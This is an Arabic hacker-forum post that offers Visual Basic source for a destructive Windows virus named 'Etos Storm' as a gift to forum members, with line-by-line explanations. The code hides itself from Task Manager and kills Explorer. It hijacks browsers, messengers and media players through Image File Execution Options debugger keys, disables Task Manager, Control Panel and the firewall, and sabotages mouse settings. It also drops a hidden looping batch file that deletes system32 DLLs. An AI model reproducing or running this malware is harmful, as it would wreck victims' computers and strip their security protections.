فيروس Etos Storm من برمجتى......هديه لاعضاء جيوش الهكر

[etos]

كود PHP:

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
(ByVal hWnd1 As Long, ByVal hWnd2 As Long, _
ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
ByVal nCmdShow As Long) As Long
Option Explicit
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long 


تعريفات للعمليات الجاريه

كود PHP:

Private Sub Form_Load() 


بدايه الحدث

كود PHP:

On Error Resume Next 


تجاوز الاخطاء او سموها كما ترييدون

كود PHP:

Dim W
Dim WindowsD As String
WindowsD = Space(144)
W = GetWindowsDirectory(WindowsD, 144) 


داله تحدد الويندوز

كود PHP:

App.TaskVisible = False 


اخفاء البرنامج من التاسك مانيجر

كود PHP:

Dim hwnd As Long
hwnd = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow hwnd, 0 


الغاء start

كود PHP:

Shell "taskkill /f /im explorer.exe" 


قتل الويندوز اكسبلورر

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ" 


كود ريجسترى لعمل debugger لملف chrome الى مسار اخر, مما يعنى لو اى حد جيه يشغله لن يفتح فى هذا المسار وستأتى له رساله خطأ

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Skype.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ" 


عمل debugger للاسكاى بى

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ" 


عمل debugger لمتصفح الويندوز

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moviemk.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ" 


عمل debugger للموفى ميكر

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winamp.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ" 


عمل debugger للوينامب

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmplayer.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinRAR.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgs.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\YahooMessenger.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ 


"
وكل هذااااااااااااااا عمل debugger للملفات الى موجوده فى كود الريجسرترى ويجعلها تعمل فى مسار مما يعنى تعطيل البرنامج

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\system\DisableTaskMgr", "00000001", "REG_DWORD" 


تعطيل التاسك مانجر من الريجسترى

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoControlPanel", "00000001", "REG_DWORD" 


تعطيل الكنترول بانل من الريجسترى

كود PHP:


CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu", "00000001", "REG_DWORD" 


تعطيل بعض الاعدادات من الريجسترى

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoWebServies", "00000001", "REG_DWORD" 


تعطيل خدمات الويب من الريجسترى

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ"
CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger", "C:\WINDOWS\security\Fatel Error.exe", "REG_SZ" 


عمل debugger للانترنت اكسبلورر والفاير فوكس الى مسار اخر

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoPropertiesMyCompute r", "00000001", "REG_DWORD"
CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\MouseSensitivity", "00000999", "REG_DWORD 


"
الاول تعطيل الاعدادات
الاخير مسئول عن الماوس

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\StandardPro file\EnableFirewall", "0", "REG_DWORD" 


تعطيل حائط النار

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_CURRENT_USER\Control Panel\Mouse\DoubleClickSpeed", "1", "REG_SZ 


"
مسئوله عن سرعه الماوس

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\AutoRun", 0, "REG_DWORD 


"
تعطيل الاوتو رن للسى دى او اليو اس بى

كود PHP:

CreateObject("WScript.Shell").regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\Cdrom\Start", 0, "REG_DWORD 


"
شبيه بالكود السابق

كود PHP:

Shell "taskkill /f /im WinRAR.exe"
Shell "taskkill /f /im firefox.exe"
Shell "taskkill /f /im IEXPLORE.exe"
Shell "taskkill /f /im YahooMessenger.exe"
Shell "taskkill /f /im msmsgs.exe"
Shell "taskkill /f /im opera.exe"
Shell "taskkill /f /im avant.exe"
Shell "taskkill /f /im mpc-hc.exe"
Shell "taskkill /f /im wmplayer.exe 


"
كل هذا يقتل هذه الملفات من التاسك مانجر
وهى المسئول عن ظهور صفحات الدوس التى تظهر ثم تختفى

كود PHP:

Open Text1.Text & "\Etos Storm.bat" For Output As #1
Print #1, "@echo off"
Print #1, "break off"
Print #1, ":V"
Print #1, "del " & Text1.Text & "\system32\*.dll"
Print #1, "goto V"
Close #1
Shell Text1.Text & "Etos Storm.bat", vbHide 


عمل ملف bat لمسح ملفاتdll التى ليست قيد العمل

كود PHP:

End Sub 


نهايه الداله

- - - تم التحديث - - -

يا اخى تكلم بالعربيه الفصحه لا افهم لهجتك